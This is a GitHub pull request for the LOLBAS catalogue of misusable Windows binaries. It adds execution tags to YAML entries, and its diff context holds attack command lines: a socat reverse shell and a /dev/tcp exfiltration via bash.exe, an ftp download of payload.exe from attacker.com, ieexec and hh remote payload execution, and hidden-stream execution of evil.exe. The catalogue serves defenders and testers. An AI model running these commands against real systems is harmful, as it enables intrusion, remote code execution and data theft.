Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pull request: Added Execute Tags to most of the LOLBas #405

Open
wants to merge 149 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
149 commits
Select commit Hold shift + click to select a range
8715370
Update gh-pages.yml
hegusung Oct 13, 2024
679b321
Update gh-pages.yml
hegusung Oct 13, 2024
0795916
Update gh-pages.yml
hegusung Oct 13, 2024
56ad2e7
Update Installutil.yml
hegusung Oct 13, 2024
0e177e7
Update gh-pages.yml
hegusung Oct 13, 2024
e573103
Update Addinutil.yml
hegusung Oct 13, 2024
58d2f4c
Update At.yml
hegusung Oct 13, 2024
a199ff5
Update Atbroker.yml
hegusung Oct 13, 2024
6d4ac1c
Update Bash.yml
hegusung Oct 13, 2024
3123301
Update Certoc.yml
hegusung Oct 13, 2024
6546853
Update Cmstp.yml
hegusung Oct 13, 2024
bb484e2
Update Conhost.yml
hegusung Oct 13, 2024
2bf4516
Update Control.yml
hegusung Oct 13, 2024
20ff06d
Update Cscript.yml Tags
hegusung Oct 13, 2024
7642b8c
Update CustomShellHost.yml Tags
hegusung Oct 13, 2024
daee90f
Update Dfsvc.yml Tags
hegusung Oct 13, 2024
0c36af1
Update Diskshadow.yml Tags
hegusung Oct 13, 2024
524ef32
Update Dnscmd.yml Tags
hegusung Oct 13, 2024
ec76e9e
Update Explorer.yml Tags
hegusung Oct 13, 2024
44a2e0c
Update Extexport.yml Tags
hegusung Oct 13, 2024
3db62ff
Update Forfiles.yml Tags
hegusung Oct 13, 2024
d8c1def
Update Fsutil.yml Tags
hegusung Oct 13, 2024
eb06fb5
Update Ftp.yml Tags
hegusung Oct 13, 2024
4e60ead
Update Gpscript.yml Tags
hegusung Oct 13, 2024
bbe0681
Update Hh.yml Tags and Added command
hegusung Oct 13, 2024
0a87854
Update Ie4uinit.yml
hegusung Oct 13, 2024
5210291
Update Iediagcmd.yml Tags
hegusung Oct 13, 2024
e8c0c77
Update Ieexec.yml Tags
hegusung Oct 13, 2024
f3739fa
Update Infdefaultinstall.yml Tags
hegusung Oct 13, 2024
bb2ab8c
Update Mavinject.yml Tags
hegusung Oct 13, 2024
699d8e9
Update Microsoft.Workflow.Compiler.yml Tags
hegusung Oct 13, 2024
75cd575
Category Bugfix
hegusung Oct 13, 2024
504c922
Update Hh.yml Tags
hegusung Oct 13, 2024
377c4b4
Update Mmc.yml Tags
hegusung Oct 13, 2024
eef914d
Update Msbuild.yml Tags
hegusung Oct 13, 2024
a88747c
Update Msconfig.yml Tags
hegusung Oct 13, 2024
9f3b237
Update Msdt.yml Tags
hegusung Oct 13, 2024
b8d98f0
Update Msedge.yml Tags
hegusung Oct 13, 2024
bd07c4d
Update Mshta.yml Tags
hegusung Oct 13, 2024
090f8e2
Update Msiexec.yml Tags
hegusung Oct 13, 2024
7783b43
Update Pcalua.yml Tags
hegusung Oct 13, 2024
5a1370c
Update Pcwrun.yml Tags
hegusung Oct 13, 2024
741e087
Update Pnputil.yml Tags
hegusung Oct 13, 2024
8d6bd28
Update Presentationhost.yml Tags
hegusung Oct 13, 2024
d1f6a8a
Update Provlaunch.yml Tags
hegusung Oct 13, 2024
9aa4200
Update Regasm.yml Tags
hegusung Oct 13, 2024
ce907b4
Update Regsvcs.yml Tags
hegusung Oct 13, 2024
b452a6c
Update Regsvr32.yml Tags
hegusung Oct 13, 2024
39adfc2
Update Rundll32.yml Tags
hegusung Oct 13, 2024
3346739
Update Runexehelper.yml Tags
hegusung Oct 13, 2024
7047b05
Update Runonce.yml Tags
hegusung Oct 13, 2024
a5191c7
Update Runscripthelper.yml Tags
hegusung Oct 13, 2024
fb19b66
Update Sc.yml Tags
hegusung Oct 13, 2024
83a18ae
Update Schtasks.yml Tags
hegusung Oct 13, 2024
cb302b5
Update Scriptrunner.yml Tags
hegusung Oct 13, 2024
a8649af
Update Setres.yml Tags
hegusung Oct 13, 2024
a6de1f2
Update SettingSyncHost.yml Tags
hegusung Oct 13, 2024
d904027
Update Ssh.yml Tags
hegusung Oct 13, 2024
dfec93e
Update Stordiag.yml Tags
hegusung Oct 13, 2024
d6e2244
Update Syncappvpublishingserver.yml
hegusung Oct 13, 2024
7d9ce4b
Update Ttdinject.yml Tags:
hegusung Oct 13, 2024
9fddf9b
Update Tttracer.yml Tags
hegusung Oct 13, 2024
e3df4d3
Update Unregmp2.yml Tags
hegusung Oct 13, 2024
615dd80
Update Vbc.yml Tags
hegusung Oct 13, 2024
9464d66
Update Verclsid.yml tags
hegusung Oct 13, 2024
266a379
Update Wab.yml Tags
hegusung Oct 13, 2024
7a5c247
Update Winget.yml Tags
hegusung Oct 13, 2024
e792f14
Update Wlrmdr.yml Tags
hegusung Oct 13, 2024
6959072
Update Wmic.yml Tags
hegusung Oct 13, 2024
9a4b3e2
Update WorkFolders.yml Tags
hegusung Oct 13, 2024
9c6e722
Update Xwizard.yml Tags
hegusung Oct 13, 2024
df306a4
Update msedge_proxy.yml Tags
hegusung Oct 13, 2024
dd7be51
Update msedgewebview2.yml Tags
hegusung Oct 13, 2024
6375a4a
Update wt.yml
hegusung Oct 13, 2024
75d04ea
Correct identation
hegusung Oct 13, 2024
e07907c
Removed Fixed and Custom Format tags
hegusung Oct 13, 2024
c34810b
Update Mshta.yml Tags
hegusung Oct 13, 2024
e25d9fa
Update Advpack.yml Tags
hegusung Oct 13, 2024
87241b3
Update Desk.yml Tags
hegusung Oct 13, 2024
f086057
Update Dfshim.yml Tags
hegusung Oct 13, 2024
f09cfa5
Update Ieadvpack.yml Tags
hegusung Oct 13, 2024
0672acf
Update Ieframe.yml Tags
hegusung Oct 13, 2024
98dde3b
Update Mshtml.yml Tags
hegusung Oct 13, 2024
25047c3
Update Pcwutl.yml Tags
hegusung Oct 13, 2024
b1d0a85
Update Setupapi.yml Tags
hegusung Oct 13, 2024
a28f2a7
Update Shdocvw.yml Tags
hegusung Oct 13, 2024
eb9dfde
Update Shell32.yml Tags
hegusung Oct 13, 2024
7533fea
Update Syssetup.yml Tags
hegusung Oct 13, 2024
5a169e4
Update Url.yml Tags
hegusung Oct 13, 2024
9ebae9a
Update Zipfldr.yml Tags
hegusung Oct 13, 2024
1f57c14
Update CL_LoadAssembly.yml Tags
hegusung Oct 13, 2024
cb73a1c
Update CL_mutexverifiers.yml tags
hegusung Oct 13, 2024
4c232b0
Update Cl_invocation.yml Tags
hegusung Oct 13, 2024
a7b0dfc
Update Launch-VsDevShell.yml Tags
hegusung Oct 13, 2024
4295f69
Update Manage-bde.yml Tags
hegusung Oct 13, 2024
8673165
Update Pubprn.yml Tags
hegusung Oct 13, 2024
66510df
Update Syncappvpublishingserver.yml Tags
hegusung Oct 13, 2024
ac7ac2a
Update UtilityFunctions.yml Tags
hegusung Oct 13, 2024
7606076
Update Winrm.yml Tags
hegusung Oct 13, 2024
43ae6c8
Update pester.yml Tags and removed duplicate
hegusung Oct 13, 2024
c9f0857
Update CL_mutexverifiers.yml: Identation change
hegusung Oct 13, 2024
16d84e3
Update AccCheckConsole.yml Tags
hegusung Oct 13, 2024
a01bab7
Update Adplus.yml Tags
hegusung Oct 13, 2024
8fc6995
Update Agentexecutor.yml Tags
hegusung Oct 13, 2024
f4cd4d0
Update Appcert.yml Tags
hegusung Oct 13, 2024
e4f73cf
Update Appvlp.yml Tags
hegusung Oct 13, 2024
351a3bc
Update Bginfo.yml Tags
hegusung Oct 13, 2024
37eaa48
Update Cdb.yml Tags
hegusung Oct 13, 2024
edf0105
Update Coregen.yml Tags
hegusung Oct 13, 2024
83c34ff
Update Csi.yml Tags
hegusung Oct 13, 2024
eb3afc6
Update DefaultPack.yml Tags
hegusung Oct 13, 2024
6e9faa6
Update Devinit.yml Tags
hegusung Oct 13, 2024
1ba7b66
Update Devtoolslauncher.yml Tags
hegusung Oct 13, 2024
bd6667b
Update Dnx.yml Tags
hegusung Oct 13, 2024
b24f3ab
Update Dotnet.yml tags
hegusung Oct 13, 2024
e2d2633
Update Dxcap.yml Tags
hegusung Oct 13, 2024
bc80d35
Update Fsi.yml tags
hegusung Oct 13, 2024
a5ede45
Update FsiAnyCpu.yml tags
hegusung Oct 13, 2024
5f2bc7e
Update Mftrace.yml Tags
hegusung Oct 13, 2024
e839f4b
Update Microsoft.NodejsTools.PressAnyKey.yml Tags
hegusung Oct 13, 2024
2e922f4
Update Msdeploy.yml Tags
hegusung Oct 13, 2024
f9ea58c
Update Msxsl.yml Tags
hegusung Oct 13, 2024
7b7c58b
Update OpenConsole.yml Tags
hegusung Oct 13, 2024
c6753c4
Update Rcsi.yml Tags
hegusung Oct 13, 2024
fa2ded3
Update Remote.yml Tags
hegusung Oct 13, 2024
57e5e0d
Update Sqlps.yml Tags
hegusung Oct 13, 2024
4df50e3
Update Sqltoolsps.yml Tags
hegusung Oct 13, 2024
ae12e13
Update Squirrel.yml tags
hegusung Oct 13, 2024
384d674
Update Te.yml Tags
hegusung Oct 13, 2024
ce9d4e5
Update Teams.yml Tags
hegusung Oct 13, 2024
927189f
Update Update.yml Tags
hegusung Oct 13, 2024
f080b42
Update VSDiagnostics.yml Tags
hegusung Oct 13, 2024
780b478
Update VSIISExeLauncher.yml Tags
hegusung Oct 13, 2024
ed5266d
Update VisualUiaVerifyNative.yml Tags
hegusung Oct 13, 2024
e0b8769
Update VsLaunchBrowser.yml Tags
hegusung Oct 13, 2024
d170ef4
Update Vshadow.yml Tags
hegusung Oct 13, 2024
ec0a196
Update Vsjitdebugger.yml Tags
hegusung Oct 13, 2024
f428073
Update Wfc.yml Tags
hegusung Oct 13, 2024
842865c
Update Wsl.yml Tags
hegusung Oct 13, 2024
cc88242
Update winfile.yml Tags
hegusung Oct 13, 2024
8e3710a
Update Csi.yml: Syntax error
hegusung Oct 13, 2024
f06ab89
Revert "Update gh-pages.yml"
hegusung Oct 13, 2024
0dc5a46
Revert "Update gh-pages.yml"
hegusung Oct 13, 2024
3cfdfdc
Revert "Update gh-pages.yml"
hegusung Oct 13, 2024
0935d63
Revert "Update gh-pages.yml"
hegusung Oct 13, 2024
b1fb82a
Update Dfshim.yml: Typo
hegusung Oct 14, 2024
ab3ea8f
Merge pull request #1 from hegusung/master
hegusung Oct 14, 2024
089614e
Various changes to Execute tags
wietze Nov 20, 2024
b46fc3f
Fixing issue with hh.yml
wietze Nov 20, 2024
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions yml/OSBinaries/Addinutil.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/At.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: Local Admin
MitreID: T1053.002
OperatingSystem: Windows 7 or older
Tags:
- Execute: CMD
Full_Path:
- Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Atbroker.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Expand Down
8 changes: 8 additions & 0 deletions yml/OSBinaries/Bash.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,27 +11,35 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Expand Down
5 changes: 3 additions & 2 deletions yml/OSBinaries/Cmstp.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Expand All @@ -21,7 +21,8 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
- Execute: INF
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Expand Down
4 changes: 4 additions & 0 deletions yml/OSBinaries/Conhost.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,17 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\conhost.exe
Detection:
Expand Down
9 changes: 9 additions & 0 deletions yml/OSBinaries/Control.yml
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,15 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Comment on lines +16 to +24
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Where did this come from?

Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/CustomShellHost.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe
Detection:
Expand Down
3 changes: 3 additions & 0 deletions yml/OSBinaries/Dfsvc.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: ClickOnce
- Execute: Remote
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
Expand Down
4 changes: 4 additions & 0 deletions yml/OSBinaries/Diskshadow.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,17 @@ Commands:
Privileges: User
MitreID: T1003.003
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows server
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Expand Down
1 change: 1 addition & 0 deletions yml/OSBinaries/Dnscmd.yml
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: DLL
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Expand Down
1 change: 0 additions & 1 deletion yml/OSBinaries/Esentutl.yml
Original file line number Diff line number Diff line change
Expand Up @@ -46,7 +46,6 @@ Commands:
Privileges: Admin
MitreID: T1003.003
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server

Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Eventvwr.yml
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Expand All @@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe
Expand Down
4 changes: 4 additions & 0 deletions yml/OSBinaries/Explorer.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,17 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe
Expand Down
4 changes: 4 additions & 0 deletions yml/OSBinaries/Forfiles.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,17 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Fsutil.yml
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\fsutil.exe
- Path: C:\Windows\SysWOW64\fsutil.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Ftp.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
Expand Down
4 changes: 4 additions & 0 deletions yml/OSBinaries/Gpscript.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,17 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe
Expand Down
17 changes: 17 additions & 0 deletions yml/OSBinaries/Hh.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,30 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CHM
- Execute: Remote
Comment on lines +27 to +37
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Same here

Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Ie4uinit.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Iediagcmd.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Internet Explorer\iediagcmd.exe
Detection:
Expand Down
6 changes: 6 additions & 0 deletions yml/OSBinaries/Ieexec.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,19 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Expand Down
2 changes: 2 additions & 0 deletions yml/OSBinaries/Infdefaultinstall.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Commands:
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Expand Down
8 changes: 4 additions & 4 deletions yml/OSBinaries/Installutil.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Expand All @@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Expand Down
4 changes: 2 additions & 2 deletions yml/OSBinaries/Jsc.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Expand All @@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
Expand Down
Loading
Loading